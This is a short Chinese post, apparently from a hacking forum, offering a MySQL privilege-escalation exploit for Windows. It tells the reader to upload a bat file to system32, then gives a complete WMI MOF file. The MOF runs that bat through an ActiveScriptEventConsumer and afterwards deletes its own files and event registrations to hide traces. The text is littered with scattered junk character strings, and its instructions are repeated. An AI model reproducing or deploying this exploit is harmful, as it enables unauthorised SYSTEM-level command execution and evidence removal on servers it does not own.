Mysql 提权即时无错Mof exp

admin

这个sql提权MOF需要运行 system下的文件，不能定义路径。
需要将要运行的命令写入到bat上传到system32目录，然后执行。
8 I7 T( s0 |7 H. E) C2 H
这个sql提权MOF需要运行 system下的文件，不能定义路径。
需要将要运行的命令写入到bat上传到system32目录，然后执行。
+ x' a- C3 V0 S8 `
#pragma
                        namespace("\\\\.\\root\\cimv2")
                        class
                        MyClass547
$ }8 s0 Y/ u" E/ ?& `* w                        {           [key]
                        string
0 J. L9 l) b  \& z6 I/ g                        Name;
5 ]3 B6 r0 E; ^                        };
                        class
2 E9 W( J) e- A( E7 j& B. E  j2 ]                        ActiveScriptEventConsumer
                        : __EventConsumer {          [key]
                        string
/ R, l# U3 ?* R                        Name;           [not_null]
                        string
( ?6 }8 c! o9 \0 d7 U$ g                        ScriptingEngine;           string
                        ScriptFileName;           [template]
! r" Q4 i" x# f6 i% f$ U! G                        string
8 r4 v$ w5 O$ [: [7 Z. }/ ?                        ScriptText;         uint32 KillTimeout;
                        }; instance of __Win32Provider as $P {
1 w" z# }* `8 x                        Name
                        =
                        "ActiveScriptEventConsumer";     CLSID =
                        "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
                        PerUserInitialization
                        = TRUE;
                        }; instance of __EventConsumerProviderRegistration {         Provider
1 H* T& N$ V6 V0 x" ^- w                        = $P;         ConsumerClassNames
6 [( I- I4 I, P$ ]3 p! F; I                        =
# |+ j- L( F' C9 [5 O% v                        {"ActiveScriptEventConsumer"};
                        };
                        Instance of ActiveScriptEventConsumer
, @" b8 K! \7 Z! V+ E! \                        as $cons {         Name
                        =
4 ]- ?7 ^+ l% `3 Q                        "ASEC";         ScriptingEngine
! w# y! U# w8 m4 w) B                        =
                        "JScript";         ScriptText
                        =
                        "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";          };
                        Instance of ActiveScriptEventConsumer
  T+ [8 O6 O* q                        as $cons2 {         Name
) c) Y: W6 G5 J$ U% u7 N$ v                        =
                        "qndASEC";         ScriptingEngine
                        =
                        "JScript";         ScriptText
- i5 i( g6 x  D2 z( X                        =
9 Q/ m0 x5 D* k                        "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
% d2 ~+ I  i' E$ ^+ x0 `+ s8 @                        }; instance of __EventFilter as $Filt {         Name
                        =
                        "instfilt";         Query
3 n: g5 f! c2 t- y" [                        =
( c6 P+ ^3 e7 _7 |1 G& C                        "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\"";         QueryLanguage
                        =
1 t# k7 ^/ A7 m& H0 P                        "WQL";         }; instance of __EventFilter as $Filt2 {         Name
1 I. V  }, `/ T                        =
/ x2 p& k7 f0 a                        "qndfilt";         Query
                        =
0 c. o5 `4 W. X/ p- |; z6 `- J' K                        "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\"";         QueryLanguage
                        =
7 H: }2 }: z" B( ]3 A                        "WQL";          }; instance of __FilterToConsumerBinding as $bind {         Consumer
# f/ [5 {) c7 D; ]                        = $cons;         Filter
                        = $Filt;
* E9 F. e2 S6 O* V: }2 C6 V1 v                        }; instance of __FilterToConsumerBinding as $bind2 {         Consumer
" x: t! V& _) D. Y3 Q* P8 d                        = $cons2;         Filter
                        = $Filt2;
/ U2 M' {; v- g& _, v                        }; instance of MyClass547
                        as $MyClass {         Name
                        =
                        "ClassConsumer";
                        };